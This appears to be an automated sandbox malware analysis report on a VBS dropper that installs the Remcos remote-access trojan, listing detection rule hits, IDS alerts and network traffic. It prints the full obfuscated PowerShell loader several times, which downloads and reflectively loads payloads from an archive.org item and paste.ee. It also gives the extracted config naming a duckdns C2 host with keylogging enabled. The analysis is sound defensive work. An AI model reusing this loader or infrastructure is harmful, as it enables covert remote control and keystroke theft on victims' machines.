'JiAoKFZBUklhQkxlICcqTURyKicpLm5hTWVbMywxMSwyXS1qT2lOJycpKCAoJ3cxJysnWnVybCA9IFZ3M2h0dHAnKydzOi8vJysnaScrJ2E2JysnMDAxMDAudXMuYXJjaGl2ZS5vcmcnKycvMjQnKycvaScrJ3RlbXMvZGV0JysnYWgtJysnbm90ZS12LycrJ0RldGFoTm8nKyd0ZVYudHgnKyd0VnczOycrJ3cxWmJhc2U2JysnNEMnKydvbnRlJysnbnQgPSAoTmV3JysnLU9iaicrJ2VjdCAnKydTeScrJ3N0ZW0uTmV0JysnLlcnKydlYkNsaWVudCkuRG93bmxvYWRTJysndHJpbmcnKycodzFadXJsKTt3JysnMVpiJysnaW4nKydhcicrJ3lDb250ZW50ID0gWycrJ1N5Jysnc3RlbS5DJysnb24nKyd2JysnZXJ0JysnXTo6RicrJ3InKydvbUJhcycrJ2U2NFN0cmluZycrJyh3MVpiYXNlNicrJzRDb250ZScrJ250KTt3MVphc3NlbWJseSA9IFsnKydSZWZsZWN0JysnaScrJ29uLkFzJysnc2VtYmx5XScrJzo6TG9hZCcrJygnKyd3MVonKydiaW5hcnlDb24nKyd0ZW50JysnKTt3MVp0JysneXBlID0gdzFaYXNzJysnZW1iJysnbHkuR2V0VHlwJysnZShWdzMnKydSdScrJ25QRS4nKydIb21lJysnVnczKTt3JysnMVptZXRob2QgPSB3JysnMVonKyd0eScrJ3BlLkdldE1ldGhvZChWdzNWQUlWdzMpO3cxWm0nKydldGgnKydvZCcrJy5JbnZva2UodycrJzFabnVsbCwgJysnWycrJ29iamVjdFtdJysnXUAoVicrJ3czMC9wV2NKJysnbicrJy9kLycrJ2UnKydlLmV0c2FwLy86c3B0dGhWdzMgLCcrJyBWdzNkZXNhdGl2YScrJ2RvVnczICwgJysnVicrJ3czZGVzYXRpdmFkbycrJ1Z3JysnMyAsJysnIFZ3M2QnKydlcycrJ2EnKyd0aXZhZG9WJysndzMsVncnKyczQWRkSW5QJysncicrJ28nKydjZXNzMzJWdzMsJysnVicrJ3czVnczKSknKS5yZXBsQWNlKCdWdzMnLFtzVHJJTkddW0NIYVJdMzkpLnJlcGxBY2UoJ3cxWicsJyQnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, Comm
                  Sigma detected: WScript or CScript Dropper
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\OIQ1ybtQdW.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\OIQ1ybtQdW.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\OIQ1ybtQdW.vbs", ProcessId: 7268, ProcessName: wscript.exe
                  Sigma detected: Change PowerShell Policies to an Insecure Level
                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoKFZBUklhQkxlICcqTURyKicpLm5hTWVbMywxMSwyXS1qT2lOJycpKCAoJ3cxJysnWnVybCA9IFZ3M2h0dHAnKydzOi8vJysnaScrJ2E2JysnMDAxMDAudXMuYXJjaGl2ZS5vcmcnKycvMjQnKycvaScrJ3RlbXMvZGV0JysnYWgtJysnbm90ZS12LycrJ0RldGFoTm8nKyd0ZVYudHgnKyd0VnczOycrJ3cxWmJhc2U2JysnNEMnKydvbnRlJysnbnQgPSAoTmV3JysnLU9iaicrJ2VjdCAnKydTeScrJ3N0ZW0uTmV0JysnLlcnKydlYkNsaWVudCkuRG93bmxvYWRTJysndHJpbmcnKycodzFadXJsKTt3JysnMVpiJysnaW4nKydhcicrJ3lDb250ZW50ID0gWycrJ1N5Jysnc3RlbS5DJysnb24nKyd2JysnZXJ0JysnXTo6RicrJ3InKydvbUJhcycrJ2U2NFN0cmluZycrJyh3MVpiYXNlNicrJzRDb250ZScrJ250KTt3MVphc3NlbWJseSA9IFsnKydSZWZsZWN0JysnaScrJ29uLkFzJysnc2VtYmx5XScrJzo6TG9hZCcrJygnKyd3MVonKydiaW5hcnlDb24nKyd0ZW50JysnKTt3MVp0JysneXBlID0gdzFaYXNzJysnZW1iJysnbHkuR2V0VHlwJysnZShWdzMnKydSdScrJ25QRS4nKydIb21lJysnVnczKTt3JysnMVptZXRob2QgPSB3JysnMVonKyd0eScrJ3BlLkdldE1ldGhvZChWdzNWQUlWdzMpO3cxWm0nKydldGgnKydvZCcrJy5JbnZva2UodycrJzFabnVsbCwgJysnWycrJ29iamVjdFtdJysnXUAoVicrJ3czMC9wV2NKJysnbicrJy9kLycrJ2UnKydlLmV0c2FwLy86c3B0dGhWdzMgLCcrJyBWdzNkZXNhdGl2YScrJ2RvVnczICwgJysnVicrJ3czZGVzYXRpdmFkbycrJ1Z3JysnMyAsJysnIFZ3M2QnKydlcycrJ2EnKyd0aXZhZG9WJysndzMsVncnKyczQWRkSW5QJysncicrJ28nKydjZXNzMzJWdzMsJysnVicrJ3czVnczKSknKS5yZXBsQWNlKCdWdzMnLFtzVHJJTkddW0NIYVJdMzkpLnJlcGxBY2UoJ3cxWicsJyQnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoKFZBUklhQkxlICcqTURyKicpLm5hTWVbMywxMSwyXS1qT2lOJycpKCAoJ3cxJysnWnVybCA9IFZ3M2h0dHAnKydzOi8vJysnaScrJ2E2JysnMDAxMDAudXMuYXJjaGl2ZS5vcmcnKycvMjQnKycvaScrJ3RlbXMvZGV0JysnYWgtJysnbm90ZS12LycrJ0RldGFoTm8nKyd0ZVYudHgnKyd0VnczOycrJ3cxWmJhc2U2JysnNEMnKydvbnRlJysnbnQgPSAoTmV3JysnLU9iaicrJ2VjdCAnKydTeScrJ3N0ZW0uTmV0JysnLlcnKydlYkNsaWVudCkuRG93bmxvYWRTJysndHJpbmcnKycodzFadXJsKTt3JysnMVpiJysnaW4nKydhcicrJ3lDb250ZW50ID0gWycrJ1N5Jysnc3RlbS5DJysnb24nKyd2JysnZXJ0JysnXTo6RicrJ3InKydvbUJhcycrJ2U2NFN0cmluZycrJyh3MVpiYXNlNicrJzRDb250ZScrJ250KTt3MVphc3NlbWJseSA9IFsnKydSZWZsZWN0JysnaScrJ29uLkFzJysnc2VtYmx5XScrJzo6TG9hZCcrJygnKyd3MVonKydiaW5hcnlDb24nKyd0ZW50JysnKTt3MVp0JysneXBlID0gdzFaYXNzJysnZW1iJysnbHkuR2V0VHlwJysnZShWdzMnKydSdScrJ25QRS4nKydIb21lJysnVnczKTt3JysnMVptZXRob2QgPSB3JysnMVonKyd0eScrJ3BlLkdldE1ldGhvZChWdzNWQUlWdzMpO3cxWm0nKydldGgnKydvZCcrJy5JbnZva2UodycrJzFabnVsbCwgJysnWycrJ29iamVjdFtdJysnXUAoVicrJ3czMC9wV2NKJysnbicrJy9kLycrJ2UnKydlLmV0c2FwLy86c3B0dGhWdzMgLCcrJyBWdzNkZXNhdGl2YScrJ2RvVnczICwgJysnVicrJ3czZGVzYXRpdmFkbycrJ1Z3JysnMyAsJysnIFZ3M2QnKydlcycrJ2EnKyd0aXZhZG9WJysndzMsVncnKyczQWRkSW5QJysncicrJ28nKydjZXNzMzJWdzMsJysnVicrJ3czVnczKSknKS5yZXBsQWNlKCdWdzMnLFtzVHJJTkddW0NIYVJdMzkpLnJlcGxBY2UoJ3cxWicsJyQnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, Comm
                  Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                  Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\OIQ1ybtQdW.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\OIQ1ybtQdW.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\OIQ1ybtQdW.vbs", ProcessId: 7268, ProcessName: wscript.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoKFZBUklhQkxlICcqTURyKicpLm5hTWVbMywxMSwyXS1qT2lOJycpKCAoJ3cxJysnWnVybCA9IFZ3M2h0dHAnKydzOi8vJysnaScrJ2E2JysnMDAxMDAudXMuYXJjaGl2ZS5vcmcnKycvMjQnKycvaScrJ3RlbXMvZGV0JysnYWgtJysnbm90ZS12LycrJ0RldGFoTm8nKyd0ZVYudHgnKyd0VnczOycrJ3cxWmJhc2U2JysnNEMnKydvbnRlJysnbnQgPSAoTmV3JysnLU9iaicrJ2VjdCAnKydTeScrJ3N0ZW0uTmV0JysnLlcnKydlYkNsaWVudCkuRG93bmxvYWRTJysndHJpbmcnKycodzFadXJsKTt3JysnMVpiJysnaW4nKydhcicrJ3lDb250ZW50ID0gWycrJ1N5Jysnc3RlbS5DJysnb24nKyd2JysnZXJ0JysnXTo6RicrJ3InKydvbUJhcycrJ2U2NFN0cmluZycrJyh3MVpiYXNlNicrJzRDb250ZScrJ250KTt3MVphc3NlbWJseSA9IFsnKydSZWZsZWN0JysnaScrJ29uLkFzJysnc2VtYmx5XScrJzo6TG9hZCcrJygnKyd3MVonKydiaW5hcnlDb24nKyd0ZW50JysnKTt3MVp0JysneXBlID0gdzFaYXNzJysnZW1iJysnbHkuR2V0VHlwJysnZShWdzMnKydSdScrJ25QRS4nKydIb21lJysnVnczKTt3JysnMVptZXRob2QgPSB3JysnMVonKyd0eScrJ3BlLkdldE1ldGhvZChWdzNWQUlWdzMpO3cxWm0nKydldGgnKydvZCcrJy5JbnZva2UodycrJzFabnVsbCwgJysnWycrJ29iamVjdFtdJysnXUAoVicrJ3czMC9wV2NKJysnbicrJy9kLycrJ2UnKydlLmV0c2FwLy86c3B0dGhWdzMgLCcrJyBWdzNkZXNhdGl2YScrJ2RvVnczICwgJysnVicrJ3czZGVzYXRpdmFkbycrJ1Z3JysnMyAsJysnIFZ3M2QnKydlcycrJ2EnKyd0aXZhZG9WJysndzMsVncnKyczQWRkSW5QJysncicrJ28nKydjZXNzMzJWdzMsJysnVicrJ3czVnczKSknKS5yZXBsQWNlKCdWdzMnLFtzVHJJTkddW0NIYVJdMzkpLnJlcGxBY2UoJ3cxWicsJyQnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoKFZBUklhQkxlICcqTURyKicpLm5hTWVbMywxMSwyXS1qT2lOJycpKCAoJ3cxJysnWnVybCA9IFZ3M2h0dHAnKydzOi8vJysnaScrJ2E2JysnMDAxMDAudXMuYXJjaGl2ZS5vcmcnKycvMjQnKycvaScrJ3RlbXMvZGV0JysnYWgtJysnbm90ZS12LycrJ0RldGFoTm8nKyd0ZVYudHgnKyd0VnczOycrJ3cxWmJhc2U2JysnNEMnKydvbnRlJysnbnQgPSAoTmV3JysnLU9iaicrJ2VjdCAnKydTeScrJ3N0ZW0uTmV0JysnLlcnKydlYkNsaWVudCkuRG93bmxvYWRTJysndHJpbmcnKycodzFadXJsKTt3JysnMVpiJysnaW4nKydhcicrJ3lDb250ZW50ID0gWycrJ1N5Jysnc3RlbS5DJysnb24nKyd2JysnZXJ0JysnXTo6RicrJ3InKydvbUJhcycrJ2U2NFN0cmluZycrJyh3MVpiYXNlNicrJzRDb250ZScrJ250KTt3MVphc3NlbWJseSA9IFsnKydSZWZsZWN0JysnaScrJ29uLkFzJysnc2VtYmx5XScrJzo6TG9hZCcrJygnKyd3MVonKydiaW5hcnlDb24nKyd0ZW50JysnKTt3MVp0JysneXBlID0gdzFaYXNzJysnZW1iJysnbHkuR2V0VHlwJysnZShWdzMnKydSdScrJ25QRS4nKydIb21lJysnVnczKTt3JysnMVptZXRob2QgPSB3JysnMVonKyd0eScrJ3BlLkdldE1ldGhvZChWdzNWQUlWdzMpO3cxWm0nKydldGgnKydvZCcrJy5JbnZva2UodycrJzFabnVsbCwgJysnWycrJ29iamVjdFtdJysnXUAoVicrJ3czMC9wV2NKJysnbicrJy9kLycrJ2UnKydlLmV0c2FwLy86c3B0dGhWdzMgLCcrJyBWdzNkZXNhdGl2YScrJ2RvVnczICwgJysnVicrJ3czZGVzYXRpdmFkbycrJ1Z3JysnMyAsJysnIFZ3M2QnKydlcycrJ2EnKyd0aXZhZG9WJysndzMsVncnKyczQWRkSW5QJysncicrJ28nKydjZXNzMzJWdzMsJysnVicrJ3czVnczKSknKS5yZXBsQWNlKCdWdzMnLFtzVHJJTkddW0NIYVJdMzkpLnJlcGxBY2UoJ3cxWicsJyQnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, Comm
                  Sigma detected: Potential Encoded PowerShell Patterns In CommandLine
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ((VARIaBLe '*MDr*').naMe[3,11,2]-jOiN'')( ('w1'+'Zurl = Vw3http'+'s://'+'i'+'a6'+'00100.us.archive.org'+'/24'+'/i'+'tems/det'+'ah-'+'note-v/'+'DetahNo'+'teV.tx'+'tVw3;'+'w1Zbase6'+'4C'+'onte'+'nt = (New'+'-Obj'+'ect '+'Sy'+'stem.Net'+'.W'+'ebClient).DownloadS'+'tring'+'(w1Zurl);w'+'1Zb'+'in'+'ar'+'yContent = ['+'Sy'+'stem.C'+'on'+'v'+'ert'+']::F'+'r'+'omBas'+'e64String'+'(w1Zbase6'+'4Conte'+'nt);w1Zassembly = ['+'Reflect'+'i'+'on.As'+'sembly]'+'::Load'+'('+'w1Z'+'binaryCon'+'tent'+');w1Zt'+'ype = w1Zass'+'emb'+'ly.GetTyp'+'e(Vw3'+'Ru'+'nPE.'+'Home'+'Vw3);w'+'1Zmethod = w'+'1Z'+'ty'+'pe.GetMethod(Vw3VAIVw3);w1Zm'+'eth'+'od'+'.Invoke(w'+'1Znull, '+'['+'object[]'+']@(V'+'w30/pWcJ'+'n'+'/d/'+'e'+'e.etsap//:sptthVw3 ,'+' Vw3desativa'+'doVw3 , '+'V'+'w3desativado'+'Vw'+'3 ,'+' Vw3d'+'es'+'a'+'tivadoV'+'w3,Vw'+'3AddInP'+'r'+'o'+'cess32Vw3,'+'V'+'w3Vw3))').replAce('Vw3',[sTrING][CHaR]39).replAce('w1Z','$'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ((VARIaBLe '*MDr*').naMe[3,11,2]-jOiN'')( ('w1'+'Zurl = Vw3http'+'s://'+'i'+'a6'+'00100.us.archive.org'+'/24'+'/i'+'tems/det'+'ah-'+'note-v/'+'DetahNo'+'teV.tx'+'tVw3;'+'w1Zbase6'+'4C'+'onte'+'nt = (New'+'-Obj'+'ect '+'Sy'+'stem.Net'+'.W'+'ebClient).DownloadS'+'tring'+'(w1Zurl);w'+'1Zb'+'in'+'ar'+'yContent = ['+'Sy'+'stem.C'+'on'+'v'+'ert'+']::F'+'r'+'omBas'+'e64String'+'(w1Zbase6'+'4Conte'+'nt);w1Zassembly = ['+'Reflect'+'i'+'on.As'+'sembly]'+'::Load'+'('+'w1Z'+'binaryCon'+'tent'+');w1Zt'+'ype = w1Zass'+'emb'+'ly.GetTyp'+'e(Vw3'+'Ru'+'nPE.'+'Home'+'Vw3);w'+'1Zmethod = w'+'1Z'+'ty'+'pe.GetMethod(Vw3VAIVw3);w1Zm'+'eth'+'od'+'.Invoke(w'+'1Znull, '+'['+'object[]'+']@(V'+'w30/pWcJ'+'n'+'/d/'+'e'+'e.etsap//:sptthVw3 ,'+' Vw3desativa'+'doVw3 , '+'V'+'w3desativado'+'Vw'+'3 ,'+' Vw3d'+'es'+'a'+'tivadoV'+'w3,Vw'+'3AddInP'+'r'+'o'+'cess32Vw3,'+'V'+'w3Vw3))').replAce('Vw3',[sTrING][CHaR]39).replAce('w1Z','$'))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoKFZBUklhQkxlICcqTURyKicpLm5hTWVbMywxMSwyXS1qT2lOJycpKCAoJ3cxJysnWnVybCA9IFZ3M2h0dHAnKydzOi8vJysnaScrJ2E2JysnMDAxMDAudXMuYXJjaGl2ZS5vcmcnKycvMjQnKycvaScrJ3RlbXMvZGV0JysnYWgtJysnbm90ZS12LycrJ0RldGFoTm8nKyd0ZVYudHgnKyd0VnczOycrJ3cxWmJhc2U2JysnNEMnKydvbnRlJysnbnQgPSAoTmV3JysnLU9iaicrJ2VjdCAnKydTeScrJ3N0ZW0uTmV0JysnLlcnKydlYkNsaWVudCkuRG93bmxvYWRTJysndHJpbmcnKycodzFadXJsKTt3JysnMVpiJysnaW4nKydhcicrJ3lDb250ZW50ID0gWycrJ1N5Jysnc3RlbS5DJysnb24nKyd2JysnZXJ0JysnXTo6RicrJ3InKydvbUJhcycrJ2U2NFN0cmluZycrJyh3MVpiYXNlNicrJzRDb250Z

                  Stealing of Sensitive Information

                  barindex
                  Sigma detected: Remcos
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, ProcessId: 8028, TargetFilename: C:\ProgramData\remcos\logs.dat

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-02T05:29:49.484635+020020204231Exploit Kit Activity Detected188.114.96.3443192.168.2.1149706TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-02T05:29:49.484635+020020204251Exploit Kit Activity Detected188.114.96.3443192.168.2.1149706TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-02T05:29:50.412161+020020327761Malware Command and Control Activity Detected192.168.2.1149707192.169.69.263000TCP
                  2024-10-02T05:30:01.255134+020020327761Malware Command and Control Activity Detected192.168.2.1149714192.169.69.263000TCP
                  2024-10-02T05:30:12.004709+020020327761Malware Command and Control Activity Detected192.168.2.1149715192.169.69.263000TCP
                  2024-10-02T05:30:22.770163+020020327761Malware Command and Control Activity Detected192.168.2.1149716192.169.69.263000TCP
                  2024-10-02T05:30:33.926374+020020327761Malware Command and Control Activity Detected192.168.2.1149717192.169.69.263000TCP
                  2024-10-02T05:30:44.693709+020020327761Malware Command and Control Activity Detected192.168.2.1149719192.169.69.263000TCP
                  2024-10-02T05:30:55.885920+020020327761Malware Command and Control Activity Detected192.168.2.1149720192.169.69.263000TCP
                  2024-10-02T05:31:06.763293+020020327761Malware Command and Control Activity Detected192.168.2.1149721192.169.69.263000TCP
                  2024-10-02T05:31:17.567431+020020327761Malware Command and Control Activity Detected192.168.2.1149722192.169.69.263000TCP
                  2024-10-02T05:31:28.523263+020020327761Malware Command and Control Activity Detected192.168.2.1149723192.169.69.263000TCP
                  2024-10-02T05:31:39.301505+020020327761Malware Command and Control Activity Detected192.168.2.1149724192.169.69.263000TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-02T05:29:49.310900+020028410751Malware Command and Control Activity Detected192.168.2.1149706188.114.96.3443TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Found malware configuration
                  Source: 0000000B.00000002.2545392429.0000000000BB8000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "23spt.duckdns.org:3000:0", "Assigned name": "TsosT", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-DCR6HW", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                  Multi AV Scanner detection for domain / URL
                  Source: 23spt.duckdns.orgVirustotal: Detection: 14%Perma Link
                  Source: 23spt.duckdns.orgVirustotal: Detection: 14%Perma Link
                  Source: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtVirustotal: Detection: 10%Perma Link
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.powershell.exe.208f494bc00.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.powershell.exe.208f494bc00.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000002.2544026663.0000000000458000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2545392429.0000000000BE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2545915861.000000000268E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2545392429.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.1392660414.00000208F34A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.1392660414.00000208F44E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7540, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 8028, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: powershell.exe, 00000006.00000002.1392660414.00000208F44E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_066a8125-4

                  Exploits

                  barindex
                  Yara detected UAC Bypass using CMSTP
                  Source: Yara matchFile source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.powershell.exe.208f494bc00.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.powershell.exe.208f494bc00.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000002.2544026663.0000000000458000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.1392660414.00000208F34A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.1392660414.00000208F44E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7540, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 8028, type: MEMORYSTR
                  Source: unknownHTTPS traffic detected: 207.241.227.240:443 -> 192.168.2.11:49705 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.11:49706 version: TLS 1.2
                  Source: Binary string: System.Data.Linq.pdb source: powershell.exe, 00000006.00000002.1417039022.00000208FBA90000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.1392660414.00000208F444C000.00000004.00000800.00020000.00000000.sdmp

                  Software Vulnerabilities

                  barindex
                  Suspicious execution chain found
                  Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.11:49707 -> 192.169.69.26:3000
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.11:49716 -> 192.169.69.26:3000
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.11:49720 -> 192.169.69.26:3000
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.11:49722 -> 192.169.69.26:3000
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.11:49724 -> 192.169.69.26:3000
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.11:49714 -> 192.169.69.26:3000
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.11:49715 -> 192.169.69.26:3000
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.11:49723 -> 192.169.69.26:3000
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.11:49721 -> 192.169.69.26:3000
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.11:49719 -> 192.169.69.26:3000
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.11:49717 -> 192.169.69.26:3000
                  Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.11:49706 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 188.114.96.3:443 -> 192.168.2.11:49706
                  Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 188.114.96.3:443 -> 192.168.2.11:49706
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: 23spt.duckdns.org
                  Connects to a pastebin service (likely for C&C)
                  Source: unknownDNS query: name: paste.ee
                  Uses dynamic DNS services
                  Source: unknownDNS query: name: 23spt.duckdns.org
                  Source: global trafficHTTP traffic detected: GET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1Host: ia600100.us.archive.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /d/nJcWp/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                  Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                  Source: Joe Sandbox ViewIP Address: 192.169.69.26 192.169.69.26
                  Source: Joe Sandbox ViewIP Address: 192.169.69.26 192.169.69.26
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewASN Name: WOWUS WOWUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1Host: ia600100.us.archive.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /d/nJcWp/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: ia600100.us.archive.org
                  Source: global trafficDNS traffic detected: DNS query: paste.ee
                  Source: global trafficDNS traffic detected: DNS query: 23spt.duckdns.org
